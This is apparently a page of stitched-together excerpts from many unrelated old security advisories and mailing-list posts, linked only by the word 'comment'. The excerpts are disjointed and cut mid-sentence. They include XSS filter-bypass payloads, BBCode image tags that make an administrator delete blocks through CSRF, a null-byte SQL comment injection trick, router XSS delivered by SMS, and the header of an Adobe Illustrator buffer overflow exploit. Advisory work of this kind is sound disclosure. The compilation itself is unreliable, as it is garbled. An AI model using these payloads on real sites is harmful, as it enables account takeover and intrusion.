Next Page >>
comments
> ActiveX control not marked as safe" is ENABLED.
This Saved XSS hole works even with this option disabled (i.e. with default
settings). But when we want to use ActiveX in our code (e.g. for Code
Execution attack), than such problem occurs. It's bug in IE (when there is
preceding comment tag), which I found when researching possibility of making
CE via XSS in IE. So I found the workaround for this bug - to set up this
option to Enabled or Prompt (for Local intranet).
> Then you say that:
> "if it's on other line (i.e. without preceding comment),
II - CROSS SITE SCRIPTING
When a guest add a comment, an HTTP packet is sent to
"comment_add_cgi.php". Before writing the comment into
a file, there is some conditions, the first condition is
that the IP sent with the POST method, must be the same
as the IP returned by the getIP() function. Let's see
the code:
___________
ChX Security |
Advisory #3 |
==========
-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-
_________________
Advisory Information |
===============
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
details/pocs
———————————
1. Denial of Service vulnerability
Post Revolution allows some HTML tags in the comments and removes all
non-permitted.
The vulnerable code is in the lines 456 to 462 in common.php:
while(stripos($s,'<') > 0){
$pos[1] = stripos($s,'<');
the data allocation location, heap structure and error handlers of the
affected software. After overwriting a large amount of memory and
pointers with arbitrary data, code execution could then be redirected to
the attacker's payload located inside the FLAC file.
Vulnerability #2: VORBIS Comment String Size Field Heap Overflow
The second vulnerability lies within the parsing of any VORBIS Comment
String Size fields. Settings this fields to an overly large size, such
as 0xFFFFFFF, could also result in another heap-based overflow allowing
arbitrary code to execute in the content of the decoding program.
Similar to the Metadata Block Size Overflow vulnerability above,
return $user;
}
}
It is possible to create a crafted comment for an article, and inject
PHP code into the "web link" field, which is not properly validated.
Then, a remote attacker could use this code to execute shell commands
remotely, eventually hiding his own tracks (e.g. deleting the injected
comment).
The password changing page is vulnerable to CSRF attack. This vulnerability
can be used to change the password of the victim. For details of this
process see "Exploits/PoCs" section.
+--> Stored XSS Vulnerability
The comment page is vulnerable to Stored XSS attack. But comments
will be published
only after administrator confirmation. However this XSS vulnerablity can be
used in conjunction with the more serious security whole (CSRF) in
order to change
administrator's password.
*Technical Description / Proof of Concept Code*
The vulnerability was found in the following code, used to parse FLAC
comments inside MPlayer:
/-----------
libmpdemux/demux_audio.c
Dear Felix,
While I love your comment and really welcome constructive criticism,
I actually think you should keep the focus on the Fox News style
question marks. Nowhere is being said that this is the end of
Defence in Depth (as a paradigm), we ask the question.
Then again you seem to be judging about something you haven't seen
nor read. Is this because I ask the Fox News style questions and you
give Fox News style comments ?
#######################################################################
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#######################################################################
#
# CVE ID : CVE-2009-4505
# Product: OpenCMS OAMP Comments Module
# Vendor: Open Source, Alkacon GmbH (Cologne, Germany)
# Subject: Cross-site scripting (XSS)
# Risk: High
# Effect: Anonymously exploitable
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
3. Vulnerability Description
------------------------------------------------------------------------------------------------------------------------
Cute News is a powerful and easy to use news management system that uses
flat files to store its database. It supports commenting, archives,
search function, file upload management, backup & restore, IP banning,
flood protection and more. It's available for free from
http://www.cutephp.com/. Cute News is at the time of writing, the second
most popular script on www.hotscripts.com. UTF-8 CuteNews is a current
fork of the Cute News project which is designed to improve security and
Diigo Toolbar - Global XSS and Information Leakage in SSL URLs
== Global XSS ==
Diigo is (http://www.diigo.com/) a social bookmarking and sharing
application which allows users to see other users comments and notes
for every website. For this feature users should use Diigolet
bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are
almost mandatory to use Diigo and almost all Diigo members have them
installed.
<body ononsubmitload=aleonsubmitrt(123);>
<salertcript>aalertlert(123);</salertcript>
7. Stored XSS in Reviews module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium
Preconditions:
1. attacker must be registered user
required for substr function and there are no substitute solution).
For bypassing this check, I consider MySQL and PHP together. The PHP
functions will consider
all strings JUST untill first null character. Also MySQL support
comment syntax
like /* the comment */ and before executing any SQL query, these
comments will be removed
from the query by MySQL.
Thus I place a null character within MySQL comment right after each
open parenthesis. So
This attack works in Internet Explorer when option “Initialize and
script ActiveX control not marked as safe” (for Local intranet) is turned
on (Enabled or Prompt). It's such bug in hole of Microsoft :-) and it's
method of bypassing of the bug. This setting is needed only during attack
via this XSS, when JS code placed on the same line, where there is a
comment. Because if it's on other line (i.e. without preceding comment),
then code will work and without this setting (Disable). That can be
achieved in case, when attack made not via XSS, but the attack code is
placed (in appropriate way) directly in body of page.
==============
Core tells the WordPress team that other administrative PHP modules can
also be rendered by non-administrative users, such as module
'admin-post.php' and 'link-parse-opml.php'.
. 2009-07-02:
WordPress team comments that 'admin.php' and 'admin-post.php' are
intentionally open and plugins can choose to hook either privileged or
unprivileged actions. They also comment that unprivileged access to
'link-parse-opml.php' is benign but having this file open is bad form.
. 2009-07-02:
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
##############################
//////////////////////////////
------------------------------------------------------
IMPACT: Stored XSS , XSRF , Defacing , etc...
------------------------------------------------------
---Remote XSS Exploit [add comment section]---
Vulnerable in "add comment" section. That's can input HTML code Injection into comment box then send to server.
URL : http://[TARGET]/[webalbum_PATH]/photo_add-c.php
POST Variable: comment --> XSS Vulnerabilities
Web: http://hackish.altervista.org
E-mail: deme [at] hackish [dot] eu
SimplePHPBlog website: http://www.simplephpblog.com/
- posting [img=add_block.php?action=delete&block_id=*] in a comment
where * is an ID of a block,
when administrator reads the comment
block * will be erased.
- posting [img=add_link.php?action=delete&link_id=*] in a comment
Reasons:
1. uninitialized arrays "patterns" and "replacements"
Preconditions:
1. attacker must be logged in as user
Comments:
1. Exploit is using "preg_replace" e-modifier
2. "register_globals" setting does not matter
3. Sentinel will not stop this exploit
4. POST method will leave clean logs in most real-world cases
Hello,
This is Robert Wann and I am representing Enova Technology. I'd like to respond to your published article about the so called "False Sense of Security" for balanced review.
My comments follow my signature line and I look forward to your publishing of our comments (Vendor Comments) to the same sites to balance the view and to give us an opportunity defending ourselves. Thank you and I look forward to hearing from you.
Regards,
Robert Wann
CTO
Enova Technology
original HTTP POST request.
The following examples show the two queries that are executed when the
<sql> element contains the string "0=1) /* " and the <order_by> element
contains the string "*/)--". User input that is active within an SQL
query is marked with a ">", user input that begins or ends a comment is
marked with a "+", and application-provided query parts that are now
commented out are marked with a "|":
----- Query 1a ---------------------------------------------------------
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
> security evaluation criteria. WG3 then eventually expressed a formal
> interest in carving deeper into the security testing methodology topic,
> issuing and approving a resolution for starting a study period of one
> year. The base of this study period, which is the first step towards a
> standardization path, would be constituted by the OSSTMM 3 and all
> security experts from national bodies will freely contribute and comment
> on it. By the end of the study period it will be determined how ISO will
> receive OSSTMM contents in its family of security standards. As outlined
> in Malaka’s presentation there are many standards that could benefit
> from a standard aligned with OSSTMM contents, such as 21827, 15408,
> 18045, 19790 and, of course, 27001. Parts of OSSTMM concepts have
Vulnerability ID: HTB22417
Reference: http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_syntype_cms_comment_text_field.html
Product: synType CMS
Vendor: MindArray GbR
Vulnerable Version: V.0.12.2 and Probably Prior Versions
Vendor Notification: 03 June 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is vulnerable to XSS attack using SMS. One of the feature of this router is the ability to send and receive SMS through its web interface. The SMS text is presented unescaped/unfiltered on the inbox view, and an attacker can craft malicious short messages to gain control over victims router.
Details
--------
The first 32 characters of every incoming SMS is presented in unescaped form in the inbox view. The 32 characters limit can be overcome by using several messages, and inserting javascript comment to merge the current message with the next one.
Example:
First message ends with /* which will comment the all the HTML code up to the second message
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
-->Fixed bug date: N/A
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#########################
Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs,
Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with
CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders •
Installation Support available
---------------------------------------------------------------------------
$ find /usr/local/share/vim -type f -name \*.vim -exec grep -h
'\<exe\(c\(u\(te\?\)\?\)\?\)\?\>' {} \; | wc -l
991
Without comments:
$ find /usr/local/share/vim -type f -name \*.vim -exec grep -h
'\<exe\(c\(u\(te\?\)\?\)\?\)\?\>' {} \; | grep -v '^[[:blank:]]*"' |
wc -l
901
* Country: USA
* Outcome: Link Spam
* Software: WordPress
* Vertical: Government
Whether comment spam by itself is an application failure or a necessary evil
for site allowing rich comments is an open question. However it is reported
that in this case vulnerability in WordPress allowed the spammers to
actually penetrate the site and modify pages and not just abuse comments.
Next Page>>
|
